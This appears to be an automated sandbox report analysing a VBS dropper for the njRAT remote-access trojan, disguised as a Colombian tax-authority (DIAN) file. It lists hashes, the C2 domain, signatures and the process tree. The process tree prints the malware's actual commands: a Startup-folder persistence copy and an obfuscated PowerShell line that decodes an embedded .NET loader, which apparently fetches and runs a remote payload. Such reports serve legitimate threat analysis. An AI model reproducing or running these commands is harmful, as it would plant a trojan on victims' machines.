Overview

overview

10

Static

static

DIRRECCION...xe.vbs

windows7_x64

8

DIRRECCION...xe.vbs

windows10-2004_x64

10

Resubmissions

18-01-2022 21:16

220118-z4l9daddel 10

18-01-2022 20:08

220118-ywt4kschh2 8

18-01-2022 20:05

220118-yt2ewachf8 8

Analysis

  • max time kernel
    1797s
  • max time network
    1790s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    18-01-2022 21:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DIRRECCION DE IMPUESTO Y ADUANAS NACIONALES DIAN.exe.vbs

  • Size

    32KB

  • MD5

    b14ab88bb304ae5d8cc5afba5b1177ba

  • SHA1

    6533a50c2bb3183523c3ec9d4597686c27143b8f

  • SHA256

    e0226d807439f58824f989e1d94049405c26c2ac3d0b681761cd4c8557e90362

  • SHA512

    f68ac8f715a5f00792baae407c1775c757d1c96937b4a251cf254d8cb224eaa8429b224a66689bb4b936d0af2c7711018bd1e46f5467b78521d64fef2c31877f

Score
10/10
njratnyan catsuricatatrojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

policyprivacy.duckdns.org:4658

Mutex

10ff818f2c6b

Attributes
  • reg_key

    10ff818f2c6b

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DIRRECCION DE IMPUESTO Y ADUANAS NACIONALES DIAN.exe.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3856
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DIRRECCION DE IMPUESTO Y ADUANAS NACIONALES DIAN.exe.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ PRB.vbs')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3984
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 5
        3⤵
        • Runs ping.exe
        PID:812
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DIRRECCION DE IMPUESTO Y ADUANAS NACIONALES DIAN.exe.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ PRB.vbs')"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:32
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DIRRECCION DE IMPUESTO Y ADUANAS NACIONALES DIAN.exe.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ PRB.vbs')
          4⤵
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4036
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J✍✍Bw✍✍Ek✍✍QwB3✍✍HY✍✍I✍✍✍✍9✍✍C✍✍✍✍Jw✍✍l✍✍EE✍✍U✍✍B5✍✍Go✍✍Z✍✍Bh✍✍FU✍✍WQBh✍✍Gs✍✍JQ✍✍n✍✍Ds✍✍WwBC✍✍Hk✍✍d✍✍Bl✍✍Fs✍✍XQBd✍✍C✍✍✍✍J✍✍BI✍✍Fc✍✍cQBN✍✍FE✍✍I✍✍✍✍9✍✍C✍✍✍✍WwBT✍✍Hk✍✍cwB0✍✍GU✍✍bQ✍✍u✍✍EM✍✍bwBu✍✍HY✍✍ZQBy✍✍HQ✍✍XQ✍✍6✍✍Do✍✍RgBy✍✍G8✍✍bQBC✍✍GE✍✍cwBl✍✍DY✍✍N✍✍BT✍✍HQ✍✍cgBp✍✍G4✍✍Zw✍✍o✍✍C✍✍✍✍J✍✍Bw✍✍Ek✍✍QwB3✍✍HY✍✍I✍✍✍✍p✍✍Ds✍✍WwBT✍✍Hk✍✍cwB0✍✍GU✍✍bQ✍✍u✍✍EE✍✍c✍✍Bw✍✍EQ✍✍bwBt✍✍GE✍✍aQBu✍✍F0✍✍Og✍✍6✍✍EM✍✍dQBy✍✍HI✍✍ZQBu✍✍HQ✍✍R✍✍Bv✍✍G0✍✍YQBp✍✍G4✍✍LgBM✍✍G8✍✍YQBk✍✍Cg✍✍J✍✍BI✍✍Fc✍✍cQBN✍✍FE✍✍KQ✍✍u✍✍Ec✍✍ZQB0✍✍FQ✍✍eQBw✍✍GU✍✍K✍✍✍✍n✍✍EM✍✍b✍✍Bh✍✍HM✍✍cwBM✍✍Gk✍✍YgBy✍✍GE✍✍cgB5✍✍DM✍✍LgBD✍✍Gw✍✍YQBz✍✍HM✍✍MQ✍✍n✍✍Ck✍✍LgBH✍✍GU✍✍d✍✍BN✍✍GU✍✍d✍✍Bo✍✍G8✍✍Z✍✍✍✍o✍✍Cc✍✍UgB1✍✍G4✍✍Jw✍✍p✍✍C4✍✍SQBu✍✍HY✍✍bwBr✍✍GU✍✍K✍✍✍✍k✍✍G4✍✍dQBs✍✍Gw✍✍L✍✍✍✍g✍✍Fs✍✍bwBi✍✍Go✍✍ZQBj✍✍HQ✍✍WwBd✍✍F0✍✍I✍✍✍✍o✍✍Cc✍✍WgBM✍✍Dg✍✍Yg✍✍v✍✍Hc✍✍YQBy✍✍C8✍✍ZQBk✍✍G8✍✍Yw✍✍v✍✍G8✍✍aQ✍✍u✍✍HM✍✍b✍✍Bv✍✍G8✍✍d✍✍B3✍✍C8✍✍Lw✍✍6✍✍HM✍✍c✍✍B0✍✍HQ✍✍a✍✍✍✍n✍✍Ck✍✍KQ✍✍=';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('✍✍','A') ) ).replace('%APyjdaUYak%','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c3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEhlbHBLZXl3b3JkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAe3QAeAB0AC4AMwAwAGUAcABtAHUAUgAvADMAMAAtAGUAcABtAHUAcgAvAHMAbQBlAHQAaQAvADIAMQAvAGcAcgBvAC4AZQB2AGkAaABjAHIAYQAuAHMAdQAuADMAMAA0ADEAMAA2AGEAaQAvAC8AOgBzAHAAdAB0AGgAAQUDJgMmAQNBAABFQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawAAF1wAdgA0AC4AMAAuADMAMAAzADEAOQAAKUMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBDAGwAYQBzAHMAMQAAB1IAdQBuAAAXXABSAGUAZwBBAHMAbQAuAGUAeABlAAAAe000wQGMFUmZ7QBV0BJNAQAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCAcEDg4OEoCJBgABARGAnQUAABKApQYgAQESgKUEAAEODgQgAQ4OBSACDg4OBQACDg4OBQAAEoCxBQABHQUOByABEoCRHQUFIAESaQ4GIAESgLkOBiACHBwdHAYAAQESgIkDAAABBAABHBwEIAECHAMgAAgDIAAOBAcBHgACHgAFEAEAHgAECgEeAAQHARMABhUSKAETAAcGFRJtARMABhUSbQETAAITAAQKARMABSABARMACLd6XFYZNOCJCLA/X38R1Qo6BwYVEigBEgwHBhUSKAESCAcGFRIoARJhBwYVEigBEiQDBhJ9BAYSgIEDBhIYBAAAEgwEAAASCAQAABJhBAAAEiQEAAASfQUAABKAgQYAAQESgIEEAAASGAQAAQEOBCAAEmkHEAEBHgAeAAcwAQEBEB4ABAgAEgwECAASCAQIABJhBAgAEiQECAASfQUIABKAgQQIABIYBCgAEwAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAABQEAAAAAKQEAJDc5MTcyQjEzLUVEQkEtNDA5Ni1CNzI1LThFOTJCNzMwQjJCQQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuNQEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC41BAEAAAAIAQABAAAAAAAYAQAKTXlUZW1wbGF0ZQgxMS4wLjAuMAAAQQEAM1N5c3RlbS5SZXNvdXJjZXMuVG9vbHMuU3Ryb25nbHlUeXBlZFJlc291cmNlQnVpbGRlcggxNi4wLjAuMAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxNi4yLjAuMAAAYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAQAQALTXkuQ29tcHV0ZXIAABMBAA5NeS5BcHBsaWNhdGlvbgAADAEAB015LlVzZXIAABMBAA5NeS5XZWJTZXJ2aWNlcwAAEAEAC015LlNldHRpbmdzAAAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAAAAAAAAAAAFBBRFBBRFC0AAAAAAAAAEjHs6YAAAAAAgAAAHkAAAA0OgAANBwAAAAAAAAAAAAA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